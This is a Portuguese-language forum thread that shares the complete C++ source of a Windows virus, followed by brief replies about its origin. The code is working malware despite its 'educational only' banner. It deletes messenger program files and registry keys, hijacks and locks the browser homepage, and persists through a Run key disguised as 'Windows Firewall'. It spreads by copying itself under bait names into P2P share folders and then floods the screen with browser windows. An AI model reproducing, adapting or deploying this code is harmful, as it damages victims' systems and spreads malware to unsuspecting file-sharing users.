Pequeno vírus.

[Anonymous]

Pequeno vírus:

load.h

Code Select Expand

font=Arial]/*LOAD.H*/
#include <stdio.h>
#include <stdlib.h>
#include <fstream>
using namespace std;

namespace system_chat                 //deletes instant chat
{
void del_msn() //disables msn messenger (works)
{
remove("C:\\Program Files\\MSN Messenger\\wmv9vcm.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcdll.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcres.dll");
remove("C:\\Program Files\\MSN Messenger\\msidcrl.dll");
remove("C:\\Program Files\\MSN Messenger\\msgrapp.dll");
remove("C:\\Program Files\\MSN Messenger\\msgsc.dll");
remove("C:\\Program Files\\MSN Messenger\\msgslang.dll");
remove("C:\\Program Files\\MSN Messenger\\psmsong.dll");
system("cls");
}             
void del_aim()//fucks a bit around with AOL. (works)
{
remove("C:\\Program Files\\Common Files\\AOL\\eehelper.ddl");
remove("C:\\Program Files\\Common Files\\AOL\\1144979710\\ee\\AOLSvcMgr.dll");
remove("C:\\Program Files\\Common Files\\AOL\\xprt5.dll");
system("rmdir C:\\Program Files\\AOL");
system("rmdir C:\\Program Files\\AOD");
system("rmdir C:\\Program Files\\Common Files\\AOL\\1144979710");//overkill
system("cls");
}       
void del_mirc()                      //disables mIRC(works)
{
remove("C:\\Program Files\\mIRC\\mirc.exe");
remove("C:\\Program Files\\mIRC\\servers");
system("cls");             
}         
void del_gaim()                       //disables Gaim (works)
{
remove("C:\\Program Files\\Gaim\\gaim.dll"); 
remove("C:\\Program Files\\Gaim\\ssl3.dll");
remove("C:\\Program Files\\Gaim\\softokn3.dll");
system("cls");               
}                             
}



BOOL RegDelnodeRecurse (HKEY hKeyRoot, LPTSTR lpSubKey)
{
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    // First, see if we can delete the key without having
    // to recurse.

    lResult = RegDeleteKey(hKeyRoot, lpSubKey);

    if (lResult == ERROR_SUCCESS)
        return TRUE;

    lResult = RegOpenKeyEx (hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);

    if (lResult != ERROR_SUCCESS)
    {
        if (lResult == ERROR_FILE_NOT_FOUND) {
            printf("Key not found.\n");
            return TRUE;
        }
        else {
            printf("Error opening key.\n");
            return FALSE;
        }
    }

    // Check for an ending slash and add one if it is missing.

    lpEnd = lpSubKey + lstrlen(lpSubKey);

    if (*(lpEnd - 1) != TEXT('\\'))
    {
        *lpEnd =  TEXT('\\');
        lpEnd++;
        *lpEnd =  TEXT('\0');
    }

    // Enumerate the keys

    dwSize = MAX_PATH;
    lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
                           NULL, NULL, &ftWrite);

    if (lResult == ERROR_SUCCESS)
    {
        do {
            lstrcpy (lpEnd, szName);
            if (!RegDelnodeRecurse(hKeyRoot, lpSubKey)) {
                break;
            }

            dwSize = MAX_PATH;

            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
                                   NULL, NULL, &ftWrite);

        } while (lResult == ERROR_SUCCESS);
    }

    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey (hKey);

    // Try again to delete the key.

    lResult = RegDeleteKey(hKeyRoot, lpSubKey);

   if (lResult == ERROR_SUCCESS)
        return TRUE;

    return FALSE;
}//My balls hurt >:O <:O NIXON ROCK ON DUDE =/ >?<


BOOL RegDelnode (HKEY hKeyRoot, LPTSTR lpSubKey)
{
    TCHAR szDelKey[2 * MAX_PATH];

    lstrcpy (szDelKey, lpSubKey);
    return RegDelnodeRecurse(hKeyRoot, szDelKey);
}

void hijack_homepage(char* site, bool lock)
{
HKEY hKey1;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",1,KEY_SET_VALUE,&hKey1 );
RegSetValueEx(hKey1, "Start Page",1,REG_SZ,(const unsigned char*)site,MAX_PATH);
RegCloseKey(hKey1);
DWORD i;
if (lock)
{
  i = 1;
}else i = 0;
HKEY hKey2;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel",1,KEY_SET_VALUE,&hKey2 );
RegSetValueEx(hKey2, "HomePage",1,REG_DWORD,(BYTE*)&i,sizeof(i));
RegCloseKey(hKey2);
}
---------------------------
main.cpp
---------------------------

Code Select Expand

#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <string.h>
#include <fstream>

#include "load.h"

//******************************************************************************
//                                                                            //                                                                           
//                         DEMONSTRATION OF A VIRII                           //                                                                             
//                                                                            //
//                                   BY                                       //
//                                                                            //
//                               Nerve                                         //
//----------------------------------------------------------------------------//
//                                                                            //
//         For any question you can contact me at  nerve@gmail.com            //
//                                                                            //
//                                                                            //
//                            ~~EDUCATIONAL ONLY~~                            //
//                                                                            // 
//******************************************************************************

using namespace std;

void DelaySecs(int secs);

ULONG WINAPI OurFirstThread(LPVOID)
{
ShellExecute(0,"open","www.rohitab.com",NULL,NULL,1);

return(0);
}

void reg(void);

BOOL RegDelnodeRecurse(HKEY hKeyRoot, LPTSTR lpSubKey);
void hijack_homepage(char* site, bool lock);
   
int main()
{
char system[100];
char pathtofile[100];

FreeConsole();//get rid of the console window :-0
reg();

HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,"\\LSD.exe");

//******************************************************************************
//Deletes various registry keys
//******************************************************************************

BOOL bSuccess;
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DFlyingObj");
    bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DPipes");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Bezier");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Marquee");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Mystify");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Stars");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Sound");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Printers");
 
//******************************************************************************
// Disable some instant messengers and Other Payloads
//******************************************************************************

system_chat::del_msn();
system_chat::del_gaim();
system_chat::del_mirc();
system_chat::del_aim();

CopyFile(system,"C:\\program files\\Morpheus\\My Shared Folder\\Vista_theme_pack.exe",0);
CopyFile(system,"C:\\program files\\Grokster\\My Grokster\\San Andreas.exe",0);
CopyFile(system,"C:\\program files\\eMule\\Incoming\\steam_down.exe",0);
CopyFile(system,"C:\\program files\\limewire\\Shared\\Limewire_pro.exe",0);

ofstream a_file9("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Hell.jpg");
  a_file9.close();
ofstream a_file4("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PACKET_MONKEYS.jpg");
  a_file4.close();
  ofstream a_file5("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\NERVE.jpg");
  a_file5.close();
  ofstream a_file96("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\MATRIX.jpg");
  a_file96.close();
  ofstream a_file95("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\HARMONEY.jpg");
  a_file95.close();



ofstream hi("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PWN.txt");
if(hi.is_open())
{
hi          << "You Got Owned!!\n\n"<< endl
         << "GET LINUX MOTHA FUCKA\n" << endl;     
      }
     
hi.close();

//******************************************************************************
//Changes Homepage
//******************************************************************************

hijack_homepage("www.rohitab.com",1); 

//******************************************************************************
// Browser spammer
//******************************************************************************

Sleep(2000);//Wait for 2000ms

for (;;)
{
unsigned long ThreadId;
CreateThread(NULL,0,OurFirstThread,0,0,&ThreadId);
}
//exit Da suxor
//
    return 0;
}

void reg(void)
{
char system[MAX_PATH];

char pathtofile[MAX_PATH];

HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,"\\LSD.exe");

CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows Firewall",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
}

[Anonymous]

PS: Me distraí e postei esse vírus no lugar errado, era pra ser na ala C++, se alguém puder transferir de lugar agradeço.

[Shady]

Qual e a fonte, pyro?

 * ponto.

[Anonymous]

Um amigo meu da Holanda entitulado Freak me passou pelo MSN, ele afirma que autoria é do irmão dele, então preferi nem mencionar fonte.
Mas a fonte é: Irmão de um cara na holanda chamado Freak.

[Anonymous]

Não vai explicar nada?

[Skayler]

@Shadows

PyroMaker está banido.

Leia o código e você terá uma explicação.